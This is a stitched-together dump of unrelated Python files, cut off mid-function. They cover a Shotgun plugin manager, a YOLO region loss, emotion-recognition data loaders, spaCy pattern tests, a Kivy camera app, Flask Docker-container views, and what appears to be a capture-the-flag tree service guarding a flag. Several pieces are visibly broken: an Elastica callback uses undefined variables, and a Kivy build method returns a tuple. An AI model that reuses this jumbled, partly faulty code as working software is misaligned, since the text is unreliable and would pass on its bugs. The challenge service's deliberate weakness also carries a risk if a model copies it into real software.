config_indexes=self.indexes_for_lang(), config_dictionary=self.dictionary_for_lang(), ) @route(r"/api/private/search/accessories/results.json") class AccessorySearchExec(CardSearchExec): FIELD_BLACKLIST = ["role"] INDEX = AccessoryIndex DEFAULT_SORT = ("ordinal", False) src/plugins/pluginManager.py1-10 """ For detailed information about the event loop, please see http://shotgunsoftware.github.com/shotgunEvents/api.html This plugin allows to control plugins from Shotgun. To use it : - Enable a Custom Non Project Entity in Shotgun, rename it to Plugins ( or whatever name you fancy ). - Change the status field to only accept 'Active' and 'Disabled' status - Add a 'Script Path' File/Link field to the entity, to control where a plugin script will be. - Add a 'Ignore Projects' multi entity Project field to the entity, to control the list of projects where a plugin shouldn't be active. - Edit your shotgunEventDaemon.conf file, and add the section : [pluginManager] sgEntity : CustomNonProjectEntity15 # the entity you enabled script_key = ??????? # The Shotgun script key to use by the pluginManager plugin script_name = ?????? # The Shotgun script name to use by the pluginManager plugin - Copy this file in a place where your shotgunEventDaemon.py script can find it - You will have to create Local File storage for places where you want to release your plugins """ import logging import os import shotgun_api3 as sg import re import sys def registerCallbacks(reg): """ Register attribute and entity changes callbacks for plugins registered in Shotgun. 
Load plugins registered in Shotgun """ reg.logger.debug('Loading pluginManager plugin.') # Retrieve config values my_name = reg.getName() cfg = reg.getConfig() if not cfg : raise ConfigError( "No config file found") reg.logger.debug( "Loading config for %s" % reg.getName() ) settings = {} keys = [ 'sgEntity', 'script_key', 'script_name'] for k in keys : settings[k] = cfg.get( my_name, k ) reg.logger.debug( "Using %s %s" % ( k, settings[k] ) ) # We will need access to the Engine from callbacks settings['engine'] = reg.getEngine() # Register all callbacks related to our custom entity # Attribute change callback eventFilter = { r'Shotgun_%s_Change' % settings['sgEntity'] : ['sg_status_list', 'sg_script_path', 'sg_ignore_projects' ] } reg.logger.debug("Registring %s", eventFilter ) reg.registerCallback( settings['script_name'], settings['script_key'], changeEventCB, eventFilter, settings ) # Entity change callbacks eventFilter = { r'Shotgun_%s_New' % settings['sgEntity'] : None, r'Shotgun_%s_Retirement' % settings['sgEntity'] : None, r'Shotgun_%s_Revival' % settings['sgEntity'] : None } reg.logger.debug("Registring %s", eventFilter ) reg.registerCallback( settings['script_name'], settings['script_key'], entityEventCB, eventFilter, settings ) # Get a list of all the existing plugins from Shotgun sgHandle = sg.Shotgun( reg.getEngine().config.getShotgunURL(), settings['script_name'], settings['script_key'] ) plugins = sgHandle.find( settings['sgEntity'], [], ['sg_script_path', 'sg_status_list', 'sg_ignore_projects'] ) reg.logger.debug( "Plugins : %s", plugins ) for p in plugins : if p['sg_script_path'] and p['sg_script_path']['local_path'] and p['sg_status_list'] == 'act' and os.path.isfile( p['sg_script_path']['local_path'] ) : reg.logger.info( "Loading %s", p['sg_script_path']['name'] ) pl = reg.getEngine().loadPlugin( p['sg_script_path']['local_path'], autoDiscover=False ) pl._pm_ignore_projects = p['sg_ignore_projects'] #reg.logger.setLevel(logging.ERROR) def changeEventCB(sg, logger, event, args): """ A callback that treats plugins attributes changes. @param sg: Shotgun instance. @param logger: A preconfigured Python logging.Logger object @param event: A Shotgun event. @param args: The args passed in at the registerCallback call. 
""" logger.debug("%s" % str(event)) etype = event['event_type'] attribute = event['attribute_name'] entity = event['entity'] if attribute == 'sg_status_list' : logger.info( "Status changed for %s", entity['name'] ) # We need some details to know what to do p = sg.find_one( entity['type'], [[ 'id', 'is', entity['id']]], ['sg_script_path', 'sg_ignore_projects'] ) if p['sg_script_path'] and p['sg_script_path']['local_path'] and os.path.isfile( p['sg_script_path']['local_path'] ) : if event['meta']['new_value'] == 'act' : logger.info('Loading %s', p['sg_script_path']['name']) pl = args['engine'].loadPlugin( p['sg_script_path']['local_path'], autoDiscover=False) pl._pm_ignore_projects = p['sg_ignore_projects'] else : #Disable the plugin logger.info('Unloading %s', p['sg_script_path']['name']) args['engine'].unloadPlugin( p['sg_script_path']['local_path']) elif attribute == 'sg_script_path' : # Should unload and reload the plugin logger.info( "Script path changed for %s", entity['name'] ) # We need some details to know what to do p = sg.find_one( entity['type'], [[ 'id', 'is', entity['id']]], ['sg_status_list', 'sg_script_path', 'sg_ignore_projects'] ) old_val = event['meta']['old_value'] # Unload the plugin if loaded if old_val and 'file_path' in old_val : # Couldn't be loaded if empty or None file_path = old_val['file_path'] # This is not the full path, it is local to the storage # We need to rebuild the old path local_path = { 'darwin' : 'mac_path', 'win32' : 'windows_path', 'linux' : 'linux_path', 'linux2' : 'linux_path' }[ sys.platform] st = sg.find_one( 'LocalStorage', [[ 'id', 'is', old_val['local_storage_id'] ]], [local_path ] ) path = os.path.join( st[ local_path], file_path ) logger.info('Unloading %s', os.path.basename( path )) args['engine'].unloadPlugin( path ) # Reload the plugin if possible if p['sg_script_path'] and p['sg_script_path']['local_path'] and p['sg_status_list'] == 'act' and os.path.isfile( p['sg_script_path']['local_path'] ) : logger.info('Loading %s', p['sg_script_path']['name']) pl = args['engine'].loadPlugin( p['sg_script_path']['local_path'], autoDiscover=False) pl._pm_ignore_projects = p['sg_ignore_projects'] elif attribute == 'sg_ignore_projects' : logger.info( "'Ignore projects' changed for %s", entity['name'] ) p = sg.find_one( entity['type'], [[ 'id', 'is', entity['id']]], ['sg_status_list', 'sg_script_path', 'sg_ignore_projects'] ) if p['sg_script_path'] and p['sg_script_path']['local_path'] : pl = args['engine'].getPlugin( p['sg_script_path']['local_path'] ) if pl : pl._pm_ignore_projects = p['sg_ignore_projects'] def entityEventCB(sg, logger, event, args): """ A callback that treat plugins entities changes @param sg: Shotgun instance. @param logger: A preconfigured Python logging.Logger object @param event: A Shotgun event. @param args: The args passed in at the registerCallback call. 
""" logger.debug("%s" % str(event)) etype = event['event_type'] attribute = event['attribute_name'] meta = event['meta'] if re.search( 'Retirement$', etype ) : # Unload the plugin p = sg.find_one( meta['entity_type'], [[ 'id', 'is', meta['entity_id']]], ['sg_script_path'], retired_only=True ) if p['sg_script_path'] and p['sg_script_path']['local_path'] : logger.info('Unloading %s', p['sg_script_path']['name']) args['engine'].unloadPlugin( p['sg_script_path']['local_path']) elif re.search( 'Revival$', etype ) or re.search( 'New$', etype ): #Should reload the plugin p = sg.find_one( meta['entity_type'], [[ 'id', 'is', meta['entity_id']]], ['sg_script_path', 'sg_status_list', 'sg_ignore_projects'] ) if p['sg_script_path'] and p['sg_script_path']['local_path'] and p['sg_status_list'] == 'act' and os.path.isfile( p['sg_script_path']['local_path'] ) : logger.info('Loading %s', p['sg_script_path']['name']) pl = args['engine'].loadPlugin( p['sg_script_path']['local_path'], autoDiscover=False) pl._pm_ignore_projects = p['sg_ignore_projects'] from arkexpress.configs import DEBUG_MODE if DEBUG_MODE: BASE_URL = "https://api-dev.ark-xpress.com" else: BASE_URL = "https://api.ark-xpress.com" ACCESS_TOKEN = "{}/oauth/access_token".format(BASE_URL) SHIPMENT_INFO = "{}/ext/v1/getshipmentsinfo".format(BASE_URL) modeling/classification/region_loss.py import time import torch import math import numpy as np import torch.nn as nn import torch.nn.functional as F from torch.autograd import Variable def bbox_anchor_iou(bbox, anchor): # bbox[0] ground truth width, bbox[1] ground truth hight, anchor[0] anchor width, anchor[1], anchor hight inter_area = torch.min(bbox[0], anchor[0]) * torch.min(bbox[1], anchor[1]) union_area = (bbox[0] * bbox[1] + 1e-16) + anchor[0] * anchor[1] - inter_area return inter_area / union_area def box_iou(box1, box2, x1y1x2y2=True): """ Returns the IoU of two bounding boxes """ if not x1y1x2y2: # Transform from center and width to exact coordinates b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2 b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2 b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2 b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2 else: # Get the coordinates of bounding boxes b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3] b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3] # get the corrdinates of the intersection rectangle inter_rect_x1 = torch.max(b1_x1, b2_x1) inter_rect_y1 = torch.max(b1_y1, b2_y1) inter_rect_x2 = torch.min(b1_x2, b2_x2) inter_rect_y2 = torch.min(b1_y2, b2_y2) # Intersection area inter_area = torch.clamp(inter_rect_x2 - inter_rect_x1 + 1, min=0) * torch.clamp( inter_rect_y2 - inter_rect_y1 + 1, min=0 ) # Union Area b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1) b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1) iou = inter_area / (b1_area + b2_area - inter_area + 1e-16) return iou def boxes_iou(box1, box2, x1y1x2y2=True): """ Returns the IoU of two bounding boxes """ if not x1y1x2y2: # Transform from center and width to exact coordinates b1_x1, b1_x2 = box1[..., 0] - box1[..., 2] / 2, box1[..., 0] + box1[..., 2] / 2 b1_y1, b1_y2 = box1[..., 1] - box1[..., 3] / 2, box1[..., 1] + box1[..., 3] / 2 b2_x1, b2_x2 = box2[..., 0] - box2[..., 2] / 2, box2[..., 0] + box2[..., 2] / 2 b2_y1, b2_y2 = box2[..., 1] - box2[..., 3] / 2, box2[..., 1] + box2[..., 3] / 2 else: # Get the coordinates of bounding boxes b1_x1, b1_y1, b1_x2, b1_y2 = box1[..., 0], box1[..., 1], box1[..., 2], box1[..., 3] 
b2_x1, b2_y1, b2_x2, b2_y2 = box2[..., 0], box2[..., 1], box2[..., 2], box2[..., 3] # get the corrdinates of the intersection rectangle inter_rect_x1 = torch.max(b1_x1, b2_x1) inter_rect_y1 = torch.max(b1_y1, b2_y1) inter_rect_x2 = torch.min(b1_x2, b2_x2) inter_rect_y2 = torch.min(b1_y2, b2_y2) # Intersection area inter_area = torch.clamp(inter_rect_x2 - inter_rect_x1 + 1, min=0) * torch.clamp( inter_rect_y2 - inter_rect_y1 + 1, min=0 ) # Union Area b1_area = (b1_x2 - b1_x1 + 1) * (b1_y2 - b1_y1 + 1) b2_area = (b2_x2 - b2_x1 + 1) * (b2_y2 - b2_y1 + 1) iou = inter_area / (b1_area + b2_area - inter_area + 1e-16) return iou def build_targets(pred_boxes, targets, anchors, ignore_thres): # target.shape [nB,4],(center x, center y, w, h) nB = pred_boxes.size(0) nA = pred_boxes.size(1) nH = pred_boxes.size(2) nW = pred_boxes.size(3) obj_mask = torch.cuda.BoolTensor(nB, nA, nH, nW).fill_(False) noobj_mask = torch.cuda.BoolTensor(nB, nA, nH, nW).fill_(True) tx = torch.cuda.FloatTensor(nB, nA, nH, nW).fill_(0) ty = torch.cuda.FloatTensor(nB, nA, nH, nW).fill_(0) tw = torch.cuda.FloatTensor(nB, nA, nH, nW).fill_(0) th = torch.cuda.FloatTensor(nB, nA, nH, nW).fill_(0) tconf = torch.cuda.FloatTensor(nB, nA, nH, nW).fill_(0) gt_x = targets[:,0]*nW # ground truth x gt_y = targets[:,1]*nH # ground truth y gt_w = targets[:,2]*nW # ground truth w gt_h = targets[:,3]*nH # ground truth h gt_box = torch.cuda.FloatTensor(targets.shape) gt_box[:,0] = targets[:,0]*nW # ground truth x gt_box[:,1] = targets[:,1]*nH # ground truth y gt_box[:,2] = targets[:,2]*nW # ground truth w gt_box[:,3] = targets[:,3]*nH # ground truth h grid_x = gt_x.long() # grid x grid_y = gt_y.long() # grid y recall50, recall75, avg_iou = 0.0, 0.0, 0.0 for b in range(nB): anchor_ious = torch.stack([bbox_anchor_iou((gt_w[b],gt_h[b]), anchor) for anchor in anchors]) best_ious, best_n = anchor_ious.max(0) obj_mask[b, best_n, grid_y[b], grid_x[b]] = True noobj_mask[b, best_n, grid_y[b], grid_x[b]] = False # Set noobj mask to zero where iou exceeds ignore threshold gt_boxes = gt_box[b].repeat(nA*nH*nW,1).view(nA,nH,nW,-1) ious = boxes_iou(pred_boxes[b], gt_boxes, x1y1x2y2=False) noobj_mask[b][ious>ignore_thres] = False # Coordinates tx[b, best_n, grid_y[b], grid_x[b]] = gt_x[b] - gt_x[b].floor() ty[b, best_n, grid_y[b], grid_x[b]] = gt_y[b] - gt_y[b].floor() # Width and height tw[b, best_n, grid_y[b], grid_x[b]] = torch.log(gt_w[b] / anchors[best_n][0] + 1e-16) th[b, best_n, grid_y[b], grid_x[b]] = torch.log(gt_h[b] / anchors[best_n][1] + 1e-16) tconf[b, best_n, grid_y[b], grid_x[b]] = 1 iou = box_iou(pred_boxes[b, best_n, grid_y[b], grid_x[b]], gt_box[b], x1y1x2y2=False) if(iou > 0.5): recall50 = recall50 + 1 if(iou > 0.75): recall75 = recall75 + 1 avg_iou += iou.item() scale = 2 - targets[:,2]*targets[:,3] return obj_mask, noobj_mask, scale, tx, ty, tw, th, tconf, recall50/nB, recall75/nB, avg_iou/nB class RegionLoss(nn.Module): def __init__(self, anchors=[[1.4940052559648322,2.3598481287086823],[4.0113013115312155,5.760873975661669]]): super(RegionLoss, self).__init__() self.anchors = torch.cuda.FloatTensor(anchors) self.num_anchors = len(anchors) self.noobject_scale = 1 self.object_scale = 5 self.thresh = 0.6 self.seen = 0 def forward(self, output, targets): nB = output.data.size(0) nA = self.num_anchors nH = output.data.size(2) nW = output.data.size(3) output = output.view(nB, nA, 5, nH, nW).permute(0, 1, 3, 4, 2).contiguous() x = torch.sigmoid(output[...,0]) y = torch.sigmoid(output[...,1]) w = output[...,2] h = output[...,3] conf = 
torch.sigmoid(output[...,4]) pred_boxes = torch.cuda.FloatTensor(4,nB*nA*nH*nW) grid_x = torch.linspace(0, nW-1, nW).repeat(nH,1).repeat(nB*nA, 1, 1).view(nB*nA*nH*nW).cuda() grid_y = torch.linspace(0, nH-1, nH).repeat(nW,1).t().repeat(nB*nA, 1, 1).view(nB*nA*nH*nW).cuda() anchor_w = self.anchors[:,0] anchor_h = self.anchors[:,1] anchor_w = anchor_w.repeat(nB, 1).repeat(1, 1, nH*nW).view(nB*nA*nH*nW) anchor_h = anchor_h.repeat(nB, 1).repeat(1, 1, nH*nW).view(nB*nA*nH*nW) pred_boxes[0] = x.view(nB*nA*nH*nW) + grid_x pred_boxes[1] = y.view(nB*nA*nH*nW) + grid_y pred_boxes[2] = torch.exp(w).view(nB*nA*nH*nW) * anchor_w pred_boxes[3] = torch.exp(h).view(nB*nA*nH*nW) * anchor_h pred_boxes = pred_boxes.transpose(0,1).contiguous().view(nB,nA,nH,nW,4) #pred_boxes = convert2cpu(pred_boxes.transpose(0,1).contiguous().view(nB,nA,nH,nW,4)) obj_mask, noobj_mask, scale, tx, ty, tw, th, tconf, recall50, recall75, avg_iou = build_targets(pred_boxes, targets.data, self.anchors, self.thresh) tx = Variable(tx.cuda()) ty = Variable(ty.cuda()) tw = Variable(tw.cuda()) th = Variable(th.cuda()) tconf = Variable(tconf.cuda()) obj_mask = Variable(obj_mask.cuda()) noobj_mask = Variable(noobj_mask.cuda()) loss_x = nn.MSELoss()(x[obj_mask]*scale, tx[obj_mask]*scale) loss_y = nn.MSELoss()(y[obj_mask]*scale, ty[obj_mask]*scale) loss_w = nn.MSELoss()(w[obj_mask]*scale, tw[obj_mask]*scale) loss_h = nn.MSELoss()(h[obj_mask]*scale, th[obj_mask]*scale) loss_conf = self.object_scale*nn.MSELoss()(conf[obj_mask], tconf[obj_mask]) + self.noobject_scale * nn.MSELoss()(conf[noobj_mask], tconf[noobj_mask]) loss = loss_x + loss_y + loss_w + loss_h + loss_conf print('loss: x %f, y %f, w %f, h %f, conf %f, total loss %f, recall50 %f, recall75 %f, avg_iou %f' % (loss_x.data, loss_y.data, loss_w.data, loss_h.data, loss_conf.data, loss.data, recall50, recall75, avg_iou)) return loss, recall50, recall75, avg_iou def evaluate(output, targets, anchors = [[1.4940052559648322,2.3598481287086823],[4.0113013115312155,5.760873975661669]]): nB = output.data.size(0) nA = len(anchors) nH = output.data.size(2) nW = output.data.size(3) grid_x = torch.linspace(0, nW-1, nW).repeat(nH,1).repeat(nB*nA, 1, 1).view(nB*nA*nH*nW).cuda() grid_y = torch.linspace(0, nH-1, nH).repeat(nW,1).t().repeat(nB*nA, 1, 1).view(nB*nA*nH*nW).cuda() anchor_w = torch.cuda.FloatTensor(anchors)[:,0] anchor_h = torch.cuda.FloatTensor(anchors)[:,1] anchor_w = anchor_w.repeat(nB, 1).repeat(1, 1, nH*nW).view(nB*nA*nH*nW) anchor_h = anchor_h.repeat(nB, 1).repeat(1, 1, nH*nW).view(nB*nA*nH*nW) output = output.view(nB, nA, 5, nH, nW).permute(0, 1, 3, 4, 2).contiguous() conf = torch.sigmoid(output[...,4]).view(nB*nA*nH*nW) gt_box = torch.cuda.FloatTensor(targets.shape) gt_box[:,0] = targets[:,0]*nW # ground truth x gt_box[:,1] = targets[:,1]*nH # ground truth y gt_box[:,2] = targets[:,2]*nW # ground truth w gt_box[:,3] = targets[:,3]*nH # ground truth h x = torch.sigmoid(output[..., 0]).view(nB*nA*nH*nW) + grid_x y = torch.sigmoid(output[..., 1]).view(nB*nA*nH*nW) + grid_y w = torch.exp(output[..., 2]).view(nB*nA*nH*nW) * anchor_w h = torch.exp(output[..., 3]).view(nB*nA*nH*nW) * anchor_h ious = np.zeros(nB) for b in range(nB): confidence = torch.FloatTensor(nA*nH*nW).copy_(conf[b*nA*nH*nW:(b+1)*nA*nH*nW]).detach().numpy() index = np.argmax(confidence) px = x[b*nA*nH*nW + index] py = y[b*nA*nH*nW + index] pw = w[b*nA*nH*nW + index] ph = h[b*nA*nH*nW + index] ious[b] = box_iou((px,py,pw,ph), gt_box[b], x1y1x2y2=False).item() return np.mean(ious) basic_code/load.py from __future__ 
import print_function import torch print(torch.__version__) import torch.utils.data import torchvision.transforms as transforms from basic_code import data_generator cate2label = {'CK+':{0: 'Happy', 1: 'Angry', 2: 'Disgust', 3: 'Fear', 4: 'Sad', 5: 'Contempt', 6: 'Surprise', 'Angry': 1,'Disgust': 2,'Fear': 3,'Happy': 0,'Contempt': 5,'Sad': 4,'Surprise': 6}, 'AFEW':{0: 'Happy',1: 'Angry',2: 'Disgust',3: 'Fear',4: 'Sad',5: 'Neutral',6: 'Surprise', 'Angry': 1,'Disgust': 2,'Fear': 3,'Happy': 0,'Neutral': 5,'Sad': 4,'Surprise': 6}} def ckplus_faces_baseline(video_root, video_list, fold, batchsize_train, batchsize_eval): train_dataset = data_generator.TenFold_VideoDataset( video_root=video_root, video_list=video_list, rectify_label=cate2label['CK+'], transform=transforms.Compose([transforms.Resize(224), transforms.RandomHorizontalFlip(), transforms.ToTensor()]), fold=fold, run_type='train' ) val_dataset = data_generator.TenFold_VideoDataset( video_root=video_root, video_list=video_list, rectify_label=cate2label['CK+'], transform=transforms.Compose([transforms.Resize(224), transforms.ToTensor()]), fold=fold, run_type='test' ) train_loader = torch.utils.data.DataLoader( train_dataset, batch_size=batchsize_train, shuffle=True, num_workers=8,pin_memory=True) val_loader = torch.utils.data.DataLoader( val_dataset, batch_size=batchsize_eval, shuffle=False, num_workers=8, pin_memory=True) return train_loader, val_loader def ckplus_faces_fan(video_root, video_list, fold, batchsize_train, batchsize_eval): train_dataset = data_generator.TenFold_TripleImageDataset( video_root=video_root, video_list=video_list, rectify_label=cate2label['CK+'], transform=transforms.Compose([ transforms.Resize(224), transforms.RandomHorizontalFlip(), transforms.ToTensor()]), fold=fold, run_type='train', ) val_dataset = data_generator.TenFold_VideoDataset( video_root=video_root, video_list=video_list, rectify_label=cate2label['CK+'], transform=transforms.Compose([transforms.Resize(224), transforms.ToTensor()]), fold=fold, run_type='test' ) train_loader = torch.utils.data.DataLoader( train_dataset, batch_size=batchsize_train, shuffle=True, num_workers=8,pin_memory=True) val_loader = torch.utils.data.DataLoader( val_dataset, batch_size=batchsize_eval, shuffle=False, num_workers=8, pin_memory=True) return train_loader, val_loader def afew_faces_baseline(root_train, list_train, batchsize_train, root_eval, list_eval, batchsize_eval): train_dataset = data_generator.VideoDataset( video_root=root_train, video_list=list_train, rectify_label=cate2label['AFEW'], transform=transforms.Compose([transforms.Resize(224), transforms.RandomHorizontalFlip(), transforms.ToTensor()]), ) val_dataset = data_generator.VideoDataset( video_root=root_eval, video_list=list_eval, rectify_label=cate2label['AFEW'], transform=transforms.Compose([transforms.Resize(224), transforms.ToTensor()]), csv=False) train_loader = torch.utils.data.DataLoader( train_dataset, batch_size=batchsize_train, shuffle=True, num_workers=8, pin_memory=True) val_loader = torch.utils.data.DataLoader( val_dataset, batch_size=batchsize_eval, shuffle=False, num_workers=8, pin_memory=True) return train_loader, val_loader def afew_faces_fan(root_train, list_train, batchsize_train, root_eval, list_eval, batchsize_eval): train_dataset = data_generator.TripleImageDataset( video_root=root_train, video_list=list_train, rectify_label=cate2label['AFEW'], transform=transforms.Compose([transforms.Resize(224), transforms.RandomHorizontalFlip(), transforms.ToTensor()]), ) val_dataset = 
data_generator.VideoDataset( video_root=root_eval, video_list=list_eval, rectify_label=cate2label['AFEW'], transform=transforms.Compose([transforms.Resize(224), transforms.ToTensor()]), csv=False) train_loader = torch.utils.data.DataLoader( train_dataset, batch_size=batchsize_train, shuffle=True, num_workers=8, pin_memory=True, drop_last=True) val_loader = torch.utils.data.DataLoader( val_dataset, batch_size=batchsize_eval, shuffle=False, num_workers=8, pin_memory=True) return train_loader, val_loader def model_parameters(_structure, _parameterDir): checkpoint = torch.load(_parameterDir) pretrained_state_dict = checkpoint['state_dict'] model_state_dict = _structure.state_dict() for key in pretrained_state_dict: if ((key == 'module.fc.weight') | (key == 'module.fc.bias')): pass else: model_state_dict[key.replace('module.', '')] = pretrained_state_dict[key] _structure.load_state_dict(model_state_dict) model = torch.nn.DataParallel(_structure).cuda() return model __doc__ = """ Modules containing callback classes for Rhino visualization """ __all__ = ["ExportGeometry"] import warnings import os import sys import numpy as np from numpy import savez from collections import defaultdict from elastica.callback_functions import CallBackBaseClass from elastica_rhino.collector import RhinoExportCollector class ExportGeometry(CallBackBaseClass): def __init__( self, collector: RhinoExportCollector, group: str, ): # Argument Parameters self.collector = collector self.step_skip = collector.step_skip # Data collector self.buffer = defaultdict(list) # Register self.registry = collector.register(group, self.buffer, step_skip) def make_callback(self, system, time, current_step: int): """ Parameters ---------- system : Each part of the system (i.e. rod, rigid body, etc) time : simulation time unit current_step : int simulation step """ if current_step % self.step_skip == 0: position = system.position_collection.copy() radius = system.radius.copy() buffer_size += sys.getsizeof(position) + sys.getsizeof(radius) self.buffer["time"].append(time) # This must exist for collector self.buffer["position"].append(position) self.buffer["radius"].append(radius) self.collector.update(buffer_size) # coding: utf-8 from __future__ import unicode_literals import pytest from spacy.matcher import Matcher from spacy.matcher._schemas import TOKEN_PATTERN_SCHEMA from spacy.errors import MatchPatternError from spacy.util import get_json_validator, validate_json # (pattern, num errors with validation, num errors identified with minimal # checks) TEST_PATTERNS = [ # Bad patterns flagged in all cases ([{"XX": "foo"}], 1, 1), ([{"IS_ALPHA": {"==": True}}, {"LIKE_NUM": None}], 2, 1), ([{"IS_PUNCT": True, "OP": "$"}], 1, 1), ([{"_": "foo"}], 1, 1), ('[{"TEXT": "foo"}, {"LOWER": "bar"}]', 1, 1), ([1, 2, 3], 3, 1), # Bad patterns flagged outside of Matcher ([{"_": {"foo": "bar", "baz": {"IN": "foo"}}}], 1, 0), # Bad patterns not flagged with minimal checks ([{"LENGTH": "2", "TEXT": 2}, {"LOWER": "test"}], 2, 0), ([{"LENGTH": {"IN": [1, 2, "3"]}}, {"POS": {"IN": "VERB"}}], 2, 0), ([{"LENGTH": {"VALUE": 5}}], 1, 0), ([{"TEXT": {"VALUE": "foo"}}], 1, 0), ([{"IS_DIGIT": -1}], 1, 0), ([{"ORTH": -1}], 1, 0), # Good patterns ([{"TEXT": "foo"}, {"LOWER": "bar"}], 0, 0), ([{"LEMMA": {"IN": ["love", "like"]}}, {"POS": "DET", "OP": "?"}], 0, 0), ([{"LIKE_NUM": True, "LENGTH": {">=": 5}}], 0, 0), ([{"LENGTH": 2}], 0, 0), ([{"LOWER": {"REGEX": "^X", "NOT_IN": ["XXX", "XY"]}}], 0, 0), ([{"NORM": "a"}, {"POS": {"IN": ["NOUN"]}}], 0, 0), ([{"_": {"foo": 
{"NOT_IN": ["bar", "baz"]}, "a": 5, "b": {">": 10}}}], 0, 0), ([{"IS_SENT_START": True}], 0, 0), ([{"SENT_START": True}], 0, 0), ] XFAIL_TEST_PATTERNS = [([{"orth": "foo"}], 0, 0)] @pytest.fixture def validator(): return get_json_validator(TOKEN_PATTERN_SCHEMA) @pytest.mark.parametrize( "pattern", [[{"XX": "y"}, {"LENGTH": "2"}, {"TEXT": {"IN": 5}}]] ) def test_matcher_pattern_validation(en_vocab, pattern): matcher = Matcher(en_vocab, validate=True) with pytest.raises(MatchPatternError): matcher.add("TEST", [pattern]) @pytest.mark.parametrize("pattern,n_errors,_", TEST_PATTERNS) def test_pattern_validation(validator, pattern, n_errors, _): errors = validate_json(pattern, validator) assert len(errors) == n_errors @pytest.mark.xfail @pytest.mark.parametrize("pattern,n_errors,_", XFAIL_TEST_PATTERNS) def test_xfail_pattern_validation(validator, pattern, n_errors, _): errors = validate_json(pattern, validator) assert len(errors) == n_errors @pytest.mark.parametrize("pattern,n_errors,n_min_errors", TEST_PATTERNS) def test_minimal_pattern_validation(en_vocab, pattern, n_errors, n_min_errors): matcher = Matcher(en_vocab) if n_min_errors > 0: with pytest.raises(ValueError): matcher.add("TEST", [pattern]) elif n_errors == 0: matcher.add("TEST", [pattern]) import kivy from kivy.app import App from kivy.uix.floatlayout import FloatLayout from kivy.uix.camera import Camera '''from kivy.uix.label import Label from kivy.uix.gridlayout import GridLayout from kivy.uix.textinput import TextInput from kivy.uix.button import Button from kivy.uix.widget import Widget from kivy.properties import ObjectProperty class Design(Widget): pass def __init__(self, **kwargs): super(Design, self).__init__(**kwargs) self.inside = GridLayout() self.inside.cols = 2 self.rows = 2 self.start = Button(text="Start", font_size=40) self.start.bind(on_press=self.toStart) self.inside.add_widget(self.start) self.stop = Button(text="Stop", font_size=40) self.stop.bind(on_press=self.toStop) self.inside.add_widget(self.stop) self.add_widget(self.inside) def toStart(self): print("first") def toStop(self): print("second")''' class MyApp(App): def build(self): return FloatLayout(), Camera(play=True, index=1, resolution=(640,480)) if __name__ == "__main__": MyApp().run()import sys import time FLAG = "REDACTED" TOTAL_INSERTS = 0 class Node: def __init__(self, data): self.left = None self.right = None self.data = data def insert(self, data): newnode = Node(data) x = self y = None while (x != None): y = x if (data < x.data): x = x.left else: x = x.right if (y == None): y = newnode elif (data < y.data): y.left = newnode else: y.right = newnode return y def findval(self, lkpval, steps=0): if lkpval < self.data: if self.left is None: return False return self.left.findval(lkpval, steps+1) elif lkpval > self.data: if self.right is None: return False return self.right.findval(lkpval, steps+1) else: return True def PrintTree(self, order=""): if self.left: self.left.PrintTree("left") print( self.data, order), if self.right: self.right.PrintTree("right") r = Node('') print(( "Tell me your pleasure.\n" "/a values\n" "/s value\n" "/p\n" "/exit\n" ) ) while(True): inp = input("Your option: ") if(inp.startswith("/a")): values = inp.split(" ")[1].split(";") for val in values: if len(values) > 10001: break TOTAL_INSERTS += 1 r.insert(val) print(TOTAL_INSERTS) sys.stdout.flush() elif(inp.startswith("/s")): print(r.findval(inp.split(" ")[1])) sys.stdout.flush() elif(inp.startswith("/p")): print(r.PrintTree()) sys.stdout.flush() elif(inp.startswith("/exit")): 
if(r.findval(FLAG)): sys.stdout.flush() break else: break print("Bye!") sys.exit()spindocker/views.py from itertools import chain import os from docker import APIError from flask import request from flask.ext.httpauth import HTTPBasicAuth from flask.ext.restful import reqparse, abort, Resource, fields, marshal, types from spindocker.tasks import audit_containers, start_container, stop_container, remove_container from spindocker.utils import r, client, RUNNING, STOPPED, STOPPING from spindocker import app, api auth = HTTPBasicAuth() users = { "admin": os.environ['SPIN_DOCKER_PASSWORD'], } @app.before_first_request def startup_audit(): audit_containers() @auth.get_password def get_pw(username): """Returns the password specified in 'SPIN_DOCKER_PASSWORD'.""" return users.get(username) container_fields = { 'container_id': fields.String, 'name': fields.String, 'image': fields.String, 'ssh_port': fields.String, 'app_port': fields.String, 'status': fields.String, 'active': fields.String, 'uri': fields.Url('container'), } def abort_if_container_doesnt_exist(container_id): """Checks that a container is found before proceeding with a request.""" if not r.exists('containers:%s' % container_id): abort(404, message="Container %s doesn't exist" % container_id) class ImageList(Resource): decorators = [auth.login_required, ] def __init__(self): self.reqparse = reqparse.RequestParser() super(ImageList, self).__init__() def get(self): """Gets a list of all tagged images for the /images endpoint.""" repo_tag_iter = (image['RepoTags'] for image in client.images()) return [repotag for repotag in chain.from_iterable(repo_tag_iter) \ if repotag != u':'] class ContainerList(Resource): decorators = [auth.login_required, ] def __init__(self): self.reqparse = reqparse.RequestParser() super(ContainerList, self).__init__() def get(self): """Returns all containers for the /containers endpoint.""" self.reqparse.add_argument('audit', type=types.boolean, default=False,) args = self.reqparse.parse_args() if args['audit']: audit_containers() containers = [r.hgetall(container) for container in r.keys('containers:*')] return [marshal(c, container_fields) for c in containers] def post(self): """Creates a new container based on a POST to /containers.""" self.reqparse.add_argument( 'image', type=str, required=True, help='Image cannot be blank') args = self.reqparse.parse_args() # Check that image exists try: image = client.inspect_image(args['image']) except APIError: abort(500, message="Image %s not found on this server" % args['image']) if not image['container_config']['ExposedPorts']: abort(500, message="This image does not expose any ports. \ Use the EXPOSE command in your dockerfile to specify some.") # Create and start the container try: result = client.create_container(image=args['image'], detach=True, ) container_id = result['Id'] container = start_container(container_id) except APIError as exception: abort(500, message=exception.explanation) return marshal(container, container_fields), 201 class Container(Resource): decorators = [auth.login_required, ] def __init__(self): self.reqparse = reqparse.RequestParser() self.reqparse.add_argument('status', type=str) super(Container, self).__init__() def get(self, container_id): """Returns information about a single container.""" 